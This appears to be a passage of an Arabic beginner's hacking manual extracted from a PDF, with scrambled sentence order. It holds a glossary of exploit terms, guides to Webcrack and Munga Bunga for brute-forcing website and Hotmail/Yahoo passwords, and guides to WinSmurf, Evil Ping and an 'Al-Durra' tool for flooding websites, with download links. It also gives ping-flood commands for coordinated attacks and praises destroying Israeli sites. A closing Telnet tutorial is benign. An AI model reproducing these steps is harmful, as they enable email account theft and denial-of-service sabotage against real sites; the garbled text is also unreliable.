‬يستخدمه الهاكرز‬ ‫غالبا لمعرفة نظام تشغيل الموقع و السيرفر التابع له ‪ ،‬و للتصال بالسيرفر‬ ‫عبر بورت معين و خصوصا بورت الف تي بي )‪ (21‬للدخول الى الموقع بطريقة خفية‬ ‫‪ Anonymous Mode‬لعرض ملفات الموقع و سحب ملف الباسورد او غيره من البيانات‪.‬‬ ‫‪23‬‬ .‬أي أن باستطاعة هذا البرنامج التصال بالسيرفر‬ ‫أوالخادم و اجراء بعض العمليات كل حسب مستواها و حالتها ‪ .‬‬ ‫‪------------------------------------------------------------------------‬‬ ‫برامج السكان أو ‪ -:Scanner‬و هي برامج موجودة للمسح على المواقع و كشف‬ ‫ثغراتهاإن وجدت ‪ ،‬فهي سريعة‪ ،‬كما أنها تملك قاعدة بيانات واسعة و كبيرة‬ ‫تحتوي على الثغرات أو الكسبلويت )‪ (Exploits‬التي يتم تطبيقها على الموقع‬ ‫لرؤية فيما اذا كان السيرفر يعاني من احدى هذه الثغرات أم ل ‪ .‫>ةةةةة<‬ ‫>ةةةةةة‪<BeReal :‬‬ ‫السلم عليكم‬ ‫لقد اعددت هذا الملف لخواني المبتدئين في تعلم طرق اختراق المواقع ‪ ،‬فقد‬ ‫تواجههم بعض الكلمات التي قد تكون غريبة عليهم و التي قد ل يفهمونها ‪،‬‬ ‫و بالتالي تشكل لهم بعض العواقب في مواصلة الفهم و التعلم ‪ .‬و من أمثلة‬ ‫هذه البرامج‪ ،‬برنامج ‪ Shadow Security Scanner‬و ‪ Stealth‬و ‪Omran Fast‬‬ ‫‪ ، Scanner‬الخ ‪.‬فال الموفق‪.‬و هو يعمل ككلينت‬ ‫أو وضعيته تكون دائما كزبون ‪ .‬‬ ‫===========================================================‬ ‫==========‬ ‫تلنت )‪ -:(Telnet‬و هو برنامج صغير موجود في الويندوز ‪ .‬‬ ‫و لهذه البرامج أنواع مختلفة ‪ ،‬منها التي تقوم بعمل سكان على نظام أو سيرفر‬ ‫معين مثل البرامج المختصة بالسكان على سيرفرات الـ ‪ IIS‬و منها برامج المسح‬ ‫على ثغرات السي جي اي فقط ‪ CGI‬و ما الى ذلك ‪.‬‬ ‫لستخدام البرنامج ‪ ،‬اذهب الى ‪ Start ==> Run ==> telnet‬و ستظهر شاشة التلنت‪.

(c.‬‬ ‫‪----------------------------------------------------------------------‬‬ ‫الجدار الناري ‪ -:FireWall‬هي برامج تستعملها السيرفرات لحمايتها من الولوج‬ ‫الغير شرعي لنظام ملفاتها من قبل المتطفلين ‪ .‬‬ ‫‪----------------------------------------------------------------------‬‬ ‫‪24‬‬ .‬هي تمثل الحماية للسيرفر طبعا ‪،‬‬ ‫و لكني أنوه بأن الفايروولت المستخدمة لحماية السيرفرات ) المواقع ( تختلف‬ ‫عن تلك التي تستخدم لحماية الجهزة ‪. Fire Wall‬و هناك بعض الكسبلويتات المكتوبة بلغة السي و يكون‬ ‫امتدادها )‪.‬‬ ‫هذه الكسبلويتات بالذات تحتاج الى كومبايلر او برنامجا لترجمتها و تحويها‬ ‫أي الكسبلويت الى اكسبلويت تنفيذي عادي يستخدم من خلل المتصفح ‪ ،‬و لتحويل‬ ‫الكسبلويت المكتبو بلغة السي هذه الى برنامجا تنفيذيا ‪ ،‬نحتاج إما الى‬ ‫نظام التشغيل لينوكس او يونكس ‪ ،‬او الى اي كومبايلر يعمل ضمن نظام التشغيل‬ ‫ويندوز ‪ .‬و لها عنوان‬ ‫‪ ، URL‬تقوم هذه الكسبلويتات بعرض ملفات الموقع و تقوم بعضها بالدخول الى‬ ‫السيرفر و التجول فيه ‪ ،‬كما توجد اكسبلويتات تقوم بشن هجوم على بورت معين‬ ‫في السيرفر لعمل كراش له ‪ ،‬و هذا ما يسمى بـ ‪.‬أشهر هذه الكومبايلرات ) المترجمات أو المحولت ( برنامج اسمه‬ ‫‪ Borland C++ Compiler‬و هي تعمل تحت نظام التشغيل ويندوز كما ذكرنا سابقا‪. Buffer Over Flow Exploits‬‬ ‫هناك أنواع من الكسبلويت ‪ ،‬فمنها ال ‪ CGI Exploits‬أو ال ‪ CGI Bugs‬و منها‬ ‫ال ‪ Unicodes Exploits‬و منها ال ‪ ، Buffer Over Flow Exploits ،‬و منها‬ ‫ال ‪، PHP Exploits‬و منها ال ‪ DOS Exploits‬و التي تقوم بعملية حجب الخدمة‬ ‫للسيرفر إن وجد فيها الثغرة المطلوبة لهذا الهجوم و ان لم يكن على السيرفر‬ ‫أي فايروول ‪ .‫‪-----------------------------------------------------------------------‬‬ ‫اكسبلويت )‪ -:(Exploits‬هي برامج تنفيذية تنفذ من خلل المتصفح ‪ .

‬‬ ‫‪---------------------------------------------------------------------‬‬‫الجذر أو الـ ‪ : root‬و هو المستخدم الجذري و الرئيسي للنظام ‪ ،‬له كل الصلحيات‬ ‫‪25‬‬ .‬و تكثر هذه الكلمة في القوائم البريدية للمواقع المهتمة‬ ‫بالسيكيوريتي و أمن الشبكات و غيرها كالقائمة البريدية الموجودة في موقع‬ ‫‪ Security Focus‬أو بوق تراك او غيرها ‪.‬‬ ‫‪----------------------------------------------------------------------‬‬ ‫‪ : passwd file‬هو الملف الذي يحتوي على باسورد الروت و باسوردات الشخاص‬ ‫المصرح لهم بالدخول الى السيرفر ‪ . etc/shadow/‬‬ ‫‪----------------------------------------------------------------------‬‬ ‫‪ -:Anonymouse‬هي الوضعية الخفية و المجهولة التي تدخل فيها الى الموقع المراد‬ ‫اختراقه‪ . Shadowed‬إن وجدت ملف الباسورد مظلل ‪ ،‬فيجب عليك حينها‬ ‫البحث عن ملف الباسورد الغير المظلل و الذي يسمى ‪ .‫‪ -:Token‬هو ملف الباسورد المظلل )‪ (Shadowed Passwd‬و الذي يكون فيه الباسورد‬ ‫على شكل * أو ‪ x‬أي ‪ . Shadow file‬تجده في‬ ‫‪.‬باسورد الموقع موجود في نفس الملف طبعا‪.‬هناك خاصية في برامج الف تي بي بنفس السم ‪ ،‬تستطيع ان تستعملها‬ ‫في الدخول المجهول الى السيرفر و سحب الملفات منه ‪.‬‬ ‫‪----------------------------------------------------------------------‬‬ ‫‪ -:Valnerableties‬أي الثغرات أو مواضع الضعف الغير محصنة أو القابلة للعطب‬ ‫و التي يعاني منها السيرفر و التي قد تشكل خطرا أمنيا عليه مما يؤدي الى‬ ‫استغللها من قبل الهاكرز في مهاجمة السيرفر و اختراقه أو تدميره ‪.‬‬ ‫ما هي مفردها ؟ ‪ Valnerable ، (:‬أي ثغرة أو بالصح موضع الضعف و المكان‬ ‫الغير مؤمن بشكل سليم ‪ .

-‬‬ ‫‪----------------------------------------------------------------------‬‬‫بوفر أوفر فلو ) ‪ : ( Buffer over Flow‬و هي نوع من أنواع الكسبلويتات التي‬ ‫تستعمل لشن هجوم الطفح على نقطة معينة من السيرفر مثل الهجوم على بورت الف تي بي‬ ‫أو غيره لجل اضعاف اتصال السيرفر و فصل اتصاله بهذا بهذا البورت و للغاء الرقعة‬ ‫الموجودة بها كي يتم استغللها مجددا ‪ -‬بعد عمل الكراش لها طبعا ‪ -‬يتم استغللها‬ ‫في معاودة التصال لها و بسهولة و دون وجود أي رقع او حواجز و سحب البيانات منها ‪.‫في التعامل مع ملفات الموقع و السيرفر من إزالة أو اضافة أو تعديل للملفات‪.‬ضربة الهاكرز طبعا هي اختراق‬ ‫السيرفر الذي يملك الكثير من المواقع ‪ ،‬فيسهل حينها اختراق جميع المواقع التي‬ ‫تندرج تحته مما يؤدي إما الى تدميرها أو العبث في ملفاتها أو تشويه واجهتها أو‬ ‫سرقة بياناتها و تدميرها أو مسحها من النت تماما ‪ ،‬و هذا ما يحدث للمواقع‬ ‫السرائيلية و بكثرة و ل الحمد ‪ .. (:‬قد يملك و يستضيف السيرفر أكثر من موقع‬ ‫واحد‪ ،‬و هذا يعتمد من سيرفر لخر و من شركة لخرى‪ .‬‬ ‫و هي شبيهة نوعا ما بعملية حجب الخدمة ‪ .‬‬ ‫انتهى‪،،،‬‬ ‫"اختراق المواقع للمبتدئين"‬ ‫الختراق للمبتدئين‪:::‬‬ ‫‪26‬‬ .‬‬ ‫‪---------------------------------------------------------------------‬‬‫السيرفر ‪ :Server‬هو الجهاز المستضيف للموقع ‪ ،‬اذ أن كل ملفات الموقع توضع فيه‬ ‫فهو جهاز كمبيوتر عاد كغيره من الجهزة لكنه ذو امكانيات عالية ككبر حجم القرص‬ ‫الصلب و سرعته الهائلة ‪ ،‬و هو متصل بالنترنت ‪ 24‬ساعة ‪ ،‬و هذا هو سبب كون‬ ‫المواقع شغالة ‪ 24‬على النترنت ‪ .‬جزاكم ال خيرا أيها المجاهدون ‪.DOS -‬اذ أنها تقوم بعملية اوفر لود على‬ ‫جزء مركز من السيرفر ‪.‬‬ ‫غالبا ما يكون باسورد الروت هو باسورد الموقع نفسه في المواقع التي تعمل ضمن‬ ‫نظام التشغيل لينوكس او يونكس و سولري و فري بي اس دي و غيرها ‪.

‬وهذه البرامج تحتوي على قائمة كبيرة تحتوي على كلمات سر يقوم‬ ‫البرنامج بتجربها على الموقع الهدف الى أن يصل إلى كلمة السر الصحيحة الخاصة بالموقع الهدف وبعد‬ ‫ذلك يسيطر المخترق على الموقع‪ .‬لكن يعيب هذه الطريقة أنها تستمر إلى أوقات طويلة بالساعات وباليام‬ ‫وهي مكلفة ماديا لن الجهاز سيبقى متصل طوال الوقت بالنترنت حتى يتم اكتشاف كلمة السرالصحيحة‪.‫في هذا القسم سوف أقوم بشرح الطرق المستخدمة في اختراق المواقع بالنسبة للمبتدئين وهذه الطرق تعتمد‬ ‫اعتمادًا كليًا على برامج التخمين‪ .‬‬ ‫انتهى‪،،،‬‬ ‫" الختراق ببرنامج ‪" Webcrack‬‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫‪27‬‬ .

.‫>ةةةةةة‪ :‬ةةةةةة<‬ ‫مرحبا شباب‬ ‫انا اعلم ان الكثير منك يعرفون هذا البرنامج لكن هل جربتوه ‪ ..‬‬ ‫‪28‬‬ .‬احب اقول‬ ‫انه واحد من اقوى البرامج لاختراق المواقع وانا من الشخاص الذين يعتمدون عليه‬ ‫الشرح ‪....

29 .

uk/webcrack40.‫وهذي وصلة البرنامج‬ http://www.co.freeserve.dunbell.zip ،،،‫انتهى‬ " MungaBunga ‫"الختراق ببرنامج‬ 30 .

....‬الخ(‬ ‫‪ 4‬هو زر بدء الهكر على اليميل و تجربه الكلمات‬ ‫‪31‬‬ .‫>ةةةةة<‬ ‫>ةةةةةة‪< KING HAKER :‬‬ ‫السلم عليكم و رحمه ال على اخوانى‪:‬‬ ‫اليوم نشرح برنامج ‪ MUNGA BUNGA‬الذى يعد من افضل برامج اختراق اليميل حتى الن و لكن‬ ‫يوجد به عيب بسيط و هو انه ل يوجد به بروكسى‬ ‫اما مميزاته فكثيره جدا‪:‬‬ ‫‪-1‬سريع جدا فى تجربه الكلمات‬ ‫‪-2‬يواصل التجربه تلقائيا بعد انقطاع الخط‬ ‫‪-3‬يمكنك اختراق المواقع به ايضا‬ ‫‪-4‬يعلن لك حاله اتصاله بسرفر اليميل الذى تخترقه‬ ‫‪-5‬يمكنك التحكم فى عدد حروف الكلمات الذى سيبدا بها)حسب التوقع(‬ ‫‪-6‬يحتوى على قائمه باسوردس خاصه بالهوت ميل و بها عدد هائل من الكلمات المتوقعه‬ ‫و كذلك بالنسبه للياهو‬ ‫و السرفرات الخرى ايضا‬ ‫و الن نبدا الشرح‪:‬‬ ‫هذا شكل البرنامج عند تشغيله‬ ‫فى رقم ‪ 1‬تضع اليميل الذى ستخترقه‬ ‫فى ‪ 2‬تضغط ‪ BROWSE‬و تضع قائمه الباسوردس المليئه بالكلمات الذى سيقوم البرنامج بتجربتها‬ ‫فى ‪ 3‬تضغط على ‪ BROWSE‬ايضا و تضع القائمه الخاصه بسرفر اليميل الذى ستخترقه )اذا كان فى‬ ‫الهوت ميل تضع قائمه الهوت ميل ‪.

htm‬‬ ‫انتهى‪،،،‬‬ ‫" برنامج تدمير المواقع ‪" WinSmurf‬‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫‪32‬‬ .‫فى ‪ 5‬يعرض الباسوردس التى يجربها الن )فى وقت الهكر(‬ ‫فى ‪ 6‬يعرض الكلمات التى بها اخطاء و سيتم المحاوله بها مره اخرى‬ ‫‪ 7‬هى حاله التصال بالسرفر الموجود به اليميل‬ ‫فى ‪ 8‬يعرض معلومات السرفر التابع لليميل الذى يجرب عليه‬ ‫بالضغط على رقم ‪ 9‬تذهب مباشره الى موقع البرنامج الرئيسى‬ ‫نضع علمه صح امام ‪ 10‬حتى اذا انقطع الخط فجاءه يتوقف البرنامج و عند معاوده التصال يستمر فى‬ ‫التجربه و ل يبدا من الول‬ ‫عند و ضع العلمه على ‪ 11‬ل يجرب البرنامج الكلمات التى بها اخطاء التى تظهر فى رقم ‪6‬‬ ‫نضع علمه صح امام ‪ 12‬حتى ل يجرب البرنامج الكلمات التى تحتوى على مسافات‬ ‫عند وضع العلمه على ‪ 13‬ل يجرب البرنامج الكلمات التى اقل من خمس احرف )مطلوب فى الهوت ميل(‬ ‫و عند وضع العلمه ايضا على ‪ 14‬ل يجرب البرنامج الكلمات التى هى اكثر من عشره احرف‬ ‫اليس برنامج ممتاز‬ ‫و قوى و سريع‬ ‫وصلة التنزيل ‪:‬‬ ‫‪http://koti.mbnet.fi/hypnosis/caliberx/cracking.

.de/files/WSmurf.planet-eagle.‬‬ ‫وصلة البرنامج‪.‫>ةةةةةة‪ :‬ةةةةةة<‬ ‫أثبت هذا البرنامج فعاليته الكبيرة في تدمير المواقع ولسيما أنه قوي جدا في إرسال طلبات وسريع ‪..‬‬ ‫‪http://www.zip‬‬ ‫انتهى‪،،،‬‬ ‫" شرح برنامج ‪ Evil Ping‬لتدمير المواقع "‬ ‫>ةةةةة ةة ةةةة ةةةةةة ةةةةةةةةةة<‬ ‫‪33‬‬ ...‬‬ ‫إذا هاهو البرنامج الحديث من ‪ winsmurf‬والذي يسميه البعض مرعب المواقع‬ ‫‪Scree Shot‬‬ ‫‪--------------------------------------------------------------‬‬ ‫‪-------------------------------------------------------------‬‬‫*** كيف تستخدم ‪ winsmurf‬؟ ***‬ ‫في غاية البساطة فقط قم بإنشاء ملف ‪ txt‬يعني نصي وحط في حروف وأرقام كثيرة يعني حاول تخلي الملف‬ ‫كبير شوي وبتعدى ‪ Kb 10‬بعدين احفظه‬ ‫وبعد كذا قم بتشغيل ‪winsmurf‬‬ ‫واستعرض الملف ‪.

‫‪.‬استخدامه من قبل ‪ 200‬شخص على القل في نفس الوقت على نفس الموقع لينجح التدمير بإذن ال عزوجل‬ ‫‪.‬ويمكن زيادة الهجمات لتصبح أقوى حتى يتم تدمير الموقع‬ ‫‪،،،‬انتهى‬ ‫" شرح برنامج الدرة لتدمير المواقع "‬ ‫>ةةةةة <‬ ‫‪34‬‬ .

‬و عند تشغيله سيظهر لك الشكل التالي ‪:‬‬ ‫لبدء الهجوم فقط إضغط على‬ ‫وليقاف الهجوم إضغط على‬ ‫عند بدء الهجوم سيعمل برنامج الدرة على بحث البروكسي الخاص بك و سيضعه لك في مكانه‪.‫عند النتهاء من تحميل البرنامج ‪ .‬فك ضغط الملف ‪ .‬‬ ‫و لتخفي هويتك عند الهجوم قم بتشغيل ‪:‬‬ ‫و ضع رقم البروكسي التالي‬ ‫‪35‬‬ .

‫وسيكون عنوان الموقع المراد الهجوم عليه هنا‬ ‫و من خواص هذا البرنامج انه ل يستطيع احد تغيير جهة الهجوم و لتجديد عنوان الموقع المراد الهجوم عليه‬ ‫و هو سيقوم تلقائيا بالبحث و التغيير‪.‬‬ ‫فقط قم بضغط‬ ‫و لمعرفة آخر اخبار البرنامج و المواقع التي تم النجاح بقصفها فقط قم بضغط ‪:‬‬ ‫و سيظهر لك الشكل التالي ‪:‬‬ ‫قم بضغط‬ ‫و ستظهر لك الخبار‪.‬‬ ‫و لعمل البرنامج بطريقة ذكية بحيث ل يبطيء النترنت ‪ .‬قم بتشغيل ‪:‬‬ ‫لتشغيل البرنامج عند عمل الوندوز قم بتشغيل ‪:‬‬ ‫‪36‬‬ .

geocities..zip‬‬ ‫‪،،،‬انتهى‬ ‫" تدمير المواقع بدون برامج "‬ ‫> ةةةةةة‪:‬ةةةة ةةة <‬ ‫‪37‬‬ .‫الشكل التالي يمثل عدد المرات الناجحة ‪:‬‬ ‫‪ :‬و هذا يمثل عدد المرات الفاشلة‬ ‫‪.‬وصلة تحميل البرنامج‬ ‫‪http://www.com/boom_q8y4/dorrah.

xxx.‬‬ ‫انتهى‪،،،‬‬ ‫" التلنيت "‬ ‫>ةةةةة ةة ةةةة ةةةة<‬ ‫‪38‬‬ .com‬‬ ‫الطريقة الثانية‪::‬‬ ‫بعد استخراج الي بي تبع الموقع المراد بالطريقة الي في العلى‪.xx.‬‬ ‫قم بكتابة المر‪:‬‬ ‫‪ping -t ip‬‬ ‫حيث ‪ ip‬يعني أي بي الموقع الموراد‪.‬بعد ذلك سيخرج لك رقم أي بي الموقع‬ ‫‪:‬قم بكتابة المر‬ ‫)اسم الموقع( )قوة الضربه( ‪) I-‬عددالضربات( ‪ping -n‬‬ ‫مثال ذلك‪:‬‬ ‫‪ping -n 1000 -l 400 www..com‬‬ ‫‪ :Xxx‬يعني اسم الموقع‬ ‫‪.‫في هذا الدرس سأقوم بشرح عدة طرق لتدمير المواقع بدون برامج ولكن هناك شرط لتدميرها أن يجتمع عدد‬ ‫‪..‬كبير على الموقع نفسه ويقوموا بتطيق الطريقة معا بعض في نفس الوقت‬ ‫‪::‬الطريقة الولى‬ ‫قم بالتوجه إلى "الدوس" ===<== اكتب المر التالي ‪:‬ـ‬ ‫‪Ping www...

the client uses the Windowname ‫يمكن استعمال‬. the Telnet service is set to manual startup. You can use the Services snap-in or the Computer Management snap-in to start. and then log on through the Telnet client ‫الخيار منشط في خصائص كلمة المرور لحد المستخدمين لن يتمكن من الدخول على ملقم التلنت عند‬ ‫ يجب الدخول ثم تغير كلمة المرور ثم التسجيل على خدمة التلنت‬NTLM ‫إستخدام‬ ‫تشغيل و إيقاف ملقم التلنت‬ In a Windows 2000 Server default installation. the user cannot log on to the Telnet service when NTLM authentication is used. or configure the Telnet service for ‫ تكون خدمة التلنت غير منشطة وتكون‬2000 ‫ في التثبيت الفتراضي لويندوز‬. The user name and password are encrypted ‫ إذا كنت تستخدم خيار التحقق من‬، ‫اسمك وكلمة المرور الخاصه بك من اجل الوصول إلى ملقم التلنت‬ ‫ سيرسل السم و كلمة المرور مشفرة وإذا لم تكن مستخدمة سترسل كنص عادي‬NTLM ‫الصحة‬ ‫ملحظة‬ If the User Must Change Password At Next Logon option is set for a user. The user must log on to the server directly and ‫ إذا كان هذا‬.‫بعد قراءة هذا الموضوع ستكون قادر على‬ ‫فهم معنى خدمة التلنت‬ ‫معرفة مكان تشغيل الخدمة والتحكم بها‬ ‫تمرين التثبيت وإستخدام التلنت‬ ‫ تسمح لمستخدمين عميل التلنت بالتصال بكمبيوتر يشغل خدمة التلنت‬2000 ‫خدمة التلنت في ويندوز‬ ‫ ويمكن أن تكون خدمة التلنت عبارة لتصال‬، ‫وإستعمال سطر الوامر ويصبح كما لو كان يجلس أمامه‬ ‫المستخدمين مع بعضهم البعض‬ ‫ عميل تلنت في أي وقت‬63 ‫وأي كمبيوتر يشغل خدمة التلنت يمكن أن يدعم إلى‬ Telnet Authentication You can use your local Windows 2000 user name and password or domain account information to access the Telnet server. If you do not use the NT LAN Manager (NTLM) authentication option. The security scheme is integrated into Windows 2000 security.automatic startup ‫ لتشغيل أو إيقاف خدمة التلنت‬Services ‫ ويمكن إستخدام الداة‬، ‫على الوضع اليدوي‬ 39 .and password.change the password. the user name and password are sent to the Telnet server as plain text. stop.s 2000 security context for authentication and the user is not prompted for a user If you are using NTLM authentication.

and then press . Telnet Server Admin ‫تستطيع فتح الداة‬ Telnet Server Administration ‫يبين الجدول التالي خيارات الداة‬ ‫الوصف‬ ‫السم‬ ‫الخيار‬ Telnet Server Admin ‫ينهي جلسة الداة‬ Quit this application 0 ‫يبين المستخدمين المتصلين بخدمة التلنت مع توضيح اسم المستخدم و الدومين و وعنوان‬ ‫الجهاز ووقت الدخول‬ List the current users 1 ‫ ينهي جلسة أحد المستخدمين الذي أنت تختاره‬Terminate a user session 2 ‫يزود قائمة بإعدادات السجل التي يمكن تغيرها‬ Display/change registry settings 3 ‫يشغل خدمة التلنت‬ Start the service 4 ‫يوقف خدمة التلنت‬ Stop the service 5 ‫إصطياد المشاكل‬ ‫يبين الجدول التالي بعض المشاكل التي يمكن أن تواجهك عند إستخدام التلنت‬ 40 . or change Telnet Server ‫ لتشغيل أو إيقاف أو الحصول‬Telnet Server Admin ‫يمكن إستخدام الداة‬. You can also use it to get a list of current users. Telnet is a service located under the Services and Applications node.Start ‫ أو اضغط‬Administrative Tools ‫في‬ .Enter Telnet Server Admin ‫الداة‬ You can use the Telnet Server Admin utility to start. type net start tlntsvr or net start telnet at the command prompt.OK ‫ ثم‬. or get information about Telnet Server.tlntadmn ‫ اكتب‬. and then select Telnet from the list of services in the details pane ‫تشغيل التلنت و إيقافة من سطر الوامر‬ You can also start or stop the Telnet service from a command prompt. terminate a user's session. To start Telnet Server.(Adminpak.Run ‫ ثم‬. Select Services from the console .registry settings ‫على معلومات عن الملقم ويمكن كذلك الحصول على عدد المستخدمين و التحكم في الجلسة الحالية من‬ ‫إنهاء التصال و تغير العدادات‬ ‫ الموجودة‬Telnet Administration Tool ‫ أضغط على‬.‫مكان التلنت‬ In the Computer Management snap-in. To stop Telnet Server.msi) ‫ تحتاج إلى تثبيت أدوات الدارة‬.tree. Telnet Server Admin ‫لفتح الداة‬ ‫ إذا كنت ل‬. stop. and then press Enter. type net stop tlntsvr or net stop telnet at the command prompt.

Communication. .Telnet ‫لتشغيل‬ ‫ مثبت على جهازك ومضبوط تكوينه ويكون‬TCP/IP ‫لتتمكن من أستخدام التلنت يجب أن يكون البروتوكول‬ ‫لديك حساب مسجل على الجهاز الذي ستتصل به‬ To display help for Telnet. type help at the Microsoft Telnet command prompt. system administration. To connect to a site. games. As a command-line application. part of the TCP/IP suite of protocols. Once you have made this connection. Using this feature.and local logon simulations are some typical uses of Telnet The Telnet client uses the Telnet protocol. You can use the Telnet client provided with Windows 2000 to connect to a remote computer. a computer using Microsoft Telnet Client can log on to a Windows 2000 computer running the Telnet .‫الحل‬ ‫السبب‬ ‫رسالة الخطاء‬ ‫راجع الخيارات وأعد كتابة خيارك‬ ‫القيمة المكتوبة لم تكن مقبولة‬ Invalid input ‫شغل خدمة التلنت‬ ‫خدمة التلنت غير مشتغلة‬ Failed to open the registry key ‫شغل الخدمة‬ ‫خدمة التلنت غير مشتغلة على الملقم‬ Failed to query the registry value ‫عميل التلنت‬ You can use Microsoft Telnet Client to connect to a remote computer running the Telnet service or other Telnet server software. type open <computer_name> where <computer_name> is the IP address or host name of the computer . The most obvious change is that Microsoft Telnet Client is now a command-line application rather than a Windows application.‫ في موجه الوامر‬telnet ‫ وتستطيع كتابة‬.service by using NTLM authentication ‫إستعمال التلنت‬ .if you were sitting in front of it Users of previous versions of Microsoft's Telnet client may notice a few changes in the version included with Windows 2000.Start ‫ انقر‬. to connect to a remote computer over a network. The type of session you conduct depends on how the Telnet software is configured.telnet ‫ ثم اكتب‬. you can communicate with the Telnet server.running the Telnet service 41 . Microsoft Telnet Client will seem very familiar to users of . log on to the remote computer.Run ‫ ثم‬.UNIX-based Telnet clients An important new feature found in Microsoft Telnet Client is NTLM authentication support. The Telnet client software allows a computer to connect to a remote server. and interact with it as .

Start‬‬ ‫اضغط ‪ OK‬لغلق مربع الحوار )‪Local Computer) Telnet properties‬‬ ‫أغلق وحدة التحكم ‪. Services‬‬ ‫سنتصل من ‪ Hishem1‬إلى ‪Hishem2‬‬ ‫من ‪ . Start‬ثم ‪ .Programs‬ثم ‪ Administrative Tools‬اضغط ‪.Run‬‬ ‫اكتب ‪ telnet‬ثم ‪.‫تمرين ضبط وإتصال بخدمة التلنت‬ ‫في هذا التمرين يجب أن يكون لديك شبكة على القل جهازين متصلين مع بعضهم البعض‬ ‫ولنفترض أن الجهاز الول اسمه ‪ Hishem1‬و الثاني ‪Hishem2‬‬ ‫وسنفترض أن خدمة التلنت مثبته على ‪ Hishem2‬ثم سنقوم بالتصال من ‪ Hishem1‬إلى ‪Hishem2‬‬ ‫سنقوم الن بتثبيت الخدمة على جهاز ‪Hishem1‬‬ ‫سجل الدخول إلى ‪ Hishem1‬ك ‪Administrator‬‬ ‫من ‪ .Services‬‬ ‫تظهر الداة ‪Services‬‬ ‫من النافذه مرر ألى اسفل ثم ضغط مزدوج على ‪.Automatic‬‬ ‫في القسم ‪.OK‬‬ ‫تظهر موجه أوامر مايكروسوفت تلنت‬ ‫اكتب ‪ help‬أو ? لمشاهدة الوامر المتاحه‬ ‫تظهر جميع الوامر المدعومة في خدمة التلنت‬ ‫اكتب ‪open Hishem2‬‬ ‫ستشاهد شاشة الترحيب‬ ‫‪42‬‬ . Start‬ثم ‪.Telnet‬‬ ‫يظهر مربع حوار ‪(The Telnet Properties (Local Computer‬‬ ‫غير ‪ Startup Type‬من ‪ Manual‬إلى ‪.Service status‬اضغط ‪.

Run‬‬ ‫اكتب ‪ tlntadmn‬ثم ‪. Start‬ثم ‪.OK‬‬ ‫يظهر إطار اوامر الداة ‪Telnet Server Admin‬‬ ‫اكتب ‪ 1‬لمشاهدة جميع التصالت الحالية كما في المثال نشاهد قد عرض اسم المستخدم و اسم الدومين‬ ‫‪ NOR‬ورقم ‪ IP‬ونوع التصال ووقت الدخول‬ ‫اكتب ‪ 2‬لنهاء جلسة مستخدم‬ ‫‪43‬‬ .‫ملحظة‬ ‫يمكن إستخدام حرف ‪ o‬بدل ‪open‬‬ ‫أي اوامر يمكنك تشغيلها من سطر الوامر في ‪Hishem2‬‬ ‫اترك هذا التصال نشط ل توقفه سننتقل الن إلى جهاز ‪ Hishem2‬لمشاهدة جلسة التلنت‬ ‫من جهاز ‪ Hishme2‬سنراقب خدمة التلنت ثم نوقف ونقطع التصال من العميل ‪Hishem1‬‬ ‫من ‪ .

com 110‬طبعا إذا كان حسابك مع‬ ‫الياهو أو اكتب الحساب الخاص بك مع ملحظة وجود فراغ بين الكلمة الولى و الجملة الثانية و الرقم‬ ‫ستظهر لك نافذة مثل الدوس اكتب ‪ user‬ثم اكتب بعدها اسم المستخدم في بريدك مع ملحظة أن الذي‬ ‫ستكتبه ل تشاهده على النافذة ل تهتم مثل ‪ user xxxx‬ثم إنتر‬ ‫بعد ذلك اكتب ‪ pass‬ثم اكتب الرقم السري مثل ‪ pass xxxx‬ثم إنتر‬ ‫إذا كان إدخالك صحيح ستشاهد كلمة ‪ Ok‬بعد ما تضغط إنتر‬ ‫سيتم إدخالك إلى الحساب‬ ‫لمشاهدة جميع الرسائل وأحجامها اكتب ‪ List‬ثم إنتر‬ ‫ستشاهد ترتيب الرسائل تحت بعض وأمام كل رقم رقم ثاني يدل على حجم الرسالة‬ ‫‪44‬‬ .‫تظهر رسالة تطلب منك تحديد هوية المستخدم الذي تريد فصله‬ ‫اكتب ‪1‬هذا رقم المستخدم في القائمة ول يوجد معنا في المثال غير و احد لذالك تكتب ‪1‬‬ ‫تظهر لئحة بالوامر المتاحة‬ ‫إرجع إلى جهاز ‪ Hishem1‬سترا أن التصال قد إنفصل مثل المثال‬ ‫اضغط أي مفتاح للمتابعة‬ ‫كيف نستفيد من خدمة التلنت في جلب البريد‬ ‫إذ تعذر عليك سحب البريد بالبرامج المخصصة لسبب ما يمكن أن تستخدم التلنت لسحب البريد وحذف‬ ‫الرسائل التي قد تكون سبب المشكلة و الطريقة كما يلي‬ ‫تكون على إتصال مع الشبكة‬ ‫من ‪ Start‬ثم ‪ Run‬ثم تكتب ‪ Telnet pop.mail.yahoo.

‫لحذف رسالة من القائمة اكتب ‪ dele‬ثم رقم الرسالة الهدف‬ ‫تنفع هذه الطريقة مع بريد ‪pop‬‬ ‫طريقة سحب البريد عن طريق التلنت من الدكتور الفنتوخ‬ ‫بعض الوامر المستخدمة مع التلنت‬ ‫وصل عميل التلنت مع جهاز بعيد‬ ‫بناء الجملة‬ ‫‪[open [\\RemoteServer] [Port‬‬ ‫المعلمات‬ ‫\\ ‪RemoteServer‬‬ ‫تحديد اسم الملقم الذي تريد إدارته‪ .‬إن لم تحدد منفذًا ما‪ ،‬سيتم افتراض المنفذ الفتراضي‪.o‬‬ ‫أمثلة‬ ‫للتصال بملقم بعيد ‪ Redmond‬من خلل رقم المنفذ ‪ ،44‬اكتب‪:‬‬ ‫‪o redmond 44‬‬ ‫لقطع تصال عميل ‪ Telnet‬من كمبيوتر بعيد‬ ‫بناء الجملة‬ ‫‪[close [\\RemoteServer‬‬ ‫المعلمات‬ ‫‪45‬‬ .‬‬ ‫‪Port‬‬ ‫تحديد المنفذ الذي تريد استخدامه‪ .‬إن لم تحدد ملقمًا ما‪ ،‬سيتم افتراض الملقم المحلي‪.‬‬ ‫ملحظات‬ ‫يمكنك اختصار هذا المر إلى ‪.

